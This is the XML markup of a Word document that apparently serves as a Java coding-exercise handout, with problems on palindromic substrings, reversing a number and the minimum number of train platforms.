    <w:p w14:paraId="1614F925" w14:textId="7FA2F34E" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2420245E"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ArrayList</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001FE1C0"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62242DAF"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F96F7D"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alindromicSubstring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C36D944"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F39CAC9"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7256CFD"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inpu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BBAAAAABBA"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D31C60"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palindrome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indPalindrome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put</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF44905"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A21CDB"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alindromic substrings:"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E39E7CF"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palindrome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orEach</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p>
    <w:p w14:paraId="5E7EB967"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E9B9004"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F0BCFF"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findPalindromes</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t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E8F70C8"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resul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List</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE68318"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length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p>
    <w:p w14:paraId="094012C7"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1D14B6"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8B081B4"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j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j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66CAC56"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ub</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ub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j</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021C1FD6"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Palindrome</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su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BFDF7E3"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resul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sub</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291B7A36"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E2C43AD"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32CF4D1"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EB8B129"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7128B4"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result</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3633696E"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D606FA2"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A78F6A"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isPalindrome</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235AF32"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lef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408EFB43"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righ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484A1AF9"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF98FEE"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whi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left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righ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A13969F"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harA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f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harA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igh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C862095"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709CF7A0"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0D4ACEF"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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09FB37C0"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05967BF2"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ue</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791DB96B" w14:textId="77777777"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46D159E" w14:textId="4ACA2E55" w:rsidR="009C1D72" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="234A4354" w14:textId="77777777" w:rsidR="00A83799" w:rsidRPr="00CE4B95" w:rsidRDefault="00A83799" w:rsidP="00A83799">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DA6AB87" w14:textId="23DBFFFB" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="356" w:name="_Toc196307836"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Program – </w:t>
      </w:r>
      <w:r w:rsidR="003B0B7D" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Reverse of given number</w:t>
      </w:r>
      <w:bookmarkEnd w:id="356"/>
    </w:p>
    <w:p w14:paraId="3E0F1E87" w14:textId="10191863" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925" w:rsidP="00AC4687">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Problem Definition: </w:t>
      </w:r>
      <w:r w:rsidR="00AC4687" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Write a program to print the reverse of a given number? Input - 1234</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6512FBA1" w14:textId="685C06DC" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56577DC9" w14:textId="77777777" w:rsidR="007B059F" w:rsidRPr="00CE4B95"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everseNumb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5815CFC" w14:textId="77777777" w:rsidR="007B059F" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED92EFF" w14:textId="77777777" w:rsidR="007B059F" w:rsidRPr="00CE4B95"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CECEBCA" w14:textId="77777777" w:rsidR="007B059F" w:rsidRPr="00CE4B95"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umb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234</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581E87A9" w14:textId="77777777" w:rsidR="007B059F" w:rsidRPr="00CE4B95"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reverse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26475229" w14:textId="77777777" w:rsidR="007B059F" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1927BABA" w14:textId="77777777" w:rsidR="007B059F" w:rsidRPr="00CE4B95"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whi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umb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4331E28" w14:textId="77777777" w:rsidR="007B059F" w:rsidRPr="00CE4B95"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digi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b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Get last digit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58189AEE" w14:textId="77777777" w:rsidR="007B059F" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            reverse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everse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0</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digi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Append digit to reversed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42FC715B" w14:textId="77777777" w:rsidR="007B059F" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            numb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Remove last digit from number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6995822E" w14:textId="77777777" w:rsidR="007B059F" w:rsidRPr="00CE4B95"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7AFFB8D" w14:textId="77777777" w:rsidR="007B059F" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255205B9" w14:textId="77777777" w:rsidR="007B059F" w:rsidRPr="00CE4B95"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Reversed Number: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eversed</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B25835" w14:textId="77777777" w:rsidR="007B059F" w:rsidRPr="00CE4B95"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D409B92" w14:textId="598B3B67" w:rsidR="007B059F" w:rsidRPr="00CE4B95"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6B03A83A" w14:textId="77777777" w:rsidR="00772D0E" w:rsidRPr="00CE4B95" w:rsidRDefault="00772D0E" w:rsidP="00772D0E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="244C407B" w14:textId="70E17F59" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="357" w:name="_Toc196307837"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Program – </w:t>
      </w:r>
      <w:r w:rsidR="00F47ACE" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Minimum number of platform required for train</w:t>
      </w:r>
      <w:bookmarkEnd w:id="357"/>
    </w:p>
    <w:p w14:paraId="54B85573" w14:textId="77777777" w:rsidR="00FD3C4B" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925" w:rsidP="00FD3C4B">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Problem Definition: </w:t>
      </w:r>
      <w:r w:rsidR="00FD3C4B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Write a program to return the minimum number of platforms required for a train?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB3083A" w14:textId="274EE0E1" w:rsidR="00FD3C4B" w:rsidRPr="00CE4B95" w:rsidRDefault="00FD3C4B" w:rsidP="00FD3C4B">
      <w:pPr>
        <w:ind w:left="360"/>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t>Input:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754F5EAD" w14:textId="46F2A16E" w:rsidR="00FD3C4B" w:rsidRPr="00CE4B95" w:rsidRDefault="00FD3C4B" w:rsidP="00FD3C4B">
      <w:pPr>
        <w:ind w:left="360"/>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t>12:05 12:50</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F0093D" w14:textId="4444AED8" w:rsidR="00FD3C4B" w:rsidRPr="00CE4B95" w:rsidRDefault="00FD3C4B" w:rsidP="00FD3C4B">
      <w:pPr>
        <w:ind w:left="360"/>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t>13:10 14:25</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139F1C57" w14:textId="4ED459EB" w:rsidR="00FD3C4B" w:rsidRPr="00CE4B95" w:rsidRDefault="00FD3C4B" w:rsidP="00FD3C4B">
      <w:pPr>
        <w:ind w:left="360"/>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t>05:30 07:25</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0EEB67" w14:textId="2EBF5FF5" w:rsidR="00FD3C4B" w:rsidRPr="00CE4B95" w:rsidRDefault="00FD3C4B" w:rsidP="00FD3C4B">
      <w:pPr>
        <w:ind w:left="360"/>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t>05:35 05:55</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C52853A" w14:textId="31446D12" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00FD3C4B" w:rsidP="00FD3C4B">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pP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t>02:15 02:20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24CDD40B" w14:textId="344F81AF" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BCEDBD3" w14:textId="3A827493"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660066"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>publ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stat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getPlatformDetails</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in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arrival</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in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departure</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D41D5F" w14:textId="52F0708D"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666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697798C1" w14:textId="40421C99"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Array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sor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arrival</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2C1CC0" w14:textId="434FF43F"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Array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sor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departure</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3357B629" w14:textId="6D59E67B"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platform</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0</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finalPlatform</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INT_MIN</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i</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0</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j</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0</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count </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0</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F41684" w14:textId="2CEBF578"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while</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i </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>arrival</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length</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1094B5" w14:textId="7334CEF0"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2025938F" w14:textId="60F0801C"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if</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arrival</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i</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lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> departure</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j</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9AAA71" w14:textId="056F8F3D"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3489948E" w14:textId="7FD87B86"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Platform</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Integer</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max</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platform</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count</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D14EDD2" w14:textId="77777777"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t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>++;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F449C9" w14:textId="589EFF16"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 xml:space="preserve">} </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000088"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BF7C36" w14:textId="66ACE4A1"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610CF570" w14:textId="77777777"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Coun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4930B103" w14:textId="77777777"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t>j</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>++;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C03AC6F" w14:textId="11CBD513"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63FB1130" w14:textId="1F9ACAFD"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t xml:space="preserve">finalPlatform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Integer</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max</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platform</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count</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>);;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31CF49D0" w14:textId="50C7447C"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880000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>//here update result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="784F6F33" w14:textId="674DFC59"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1A69F20A" w14:textId="0D2B310F"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return</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> finalPlatform</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D771C82" w14:textId="7401F1D7"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for</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i</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0</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i</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>num</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i</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>++)</w:t>
      </w:r>
    </w:p>
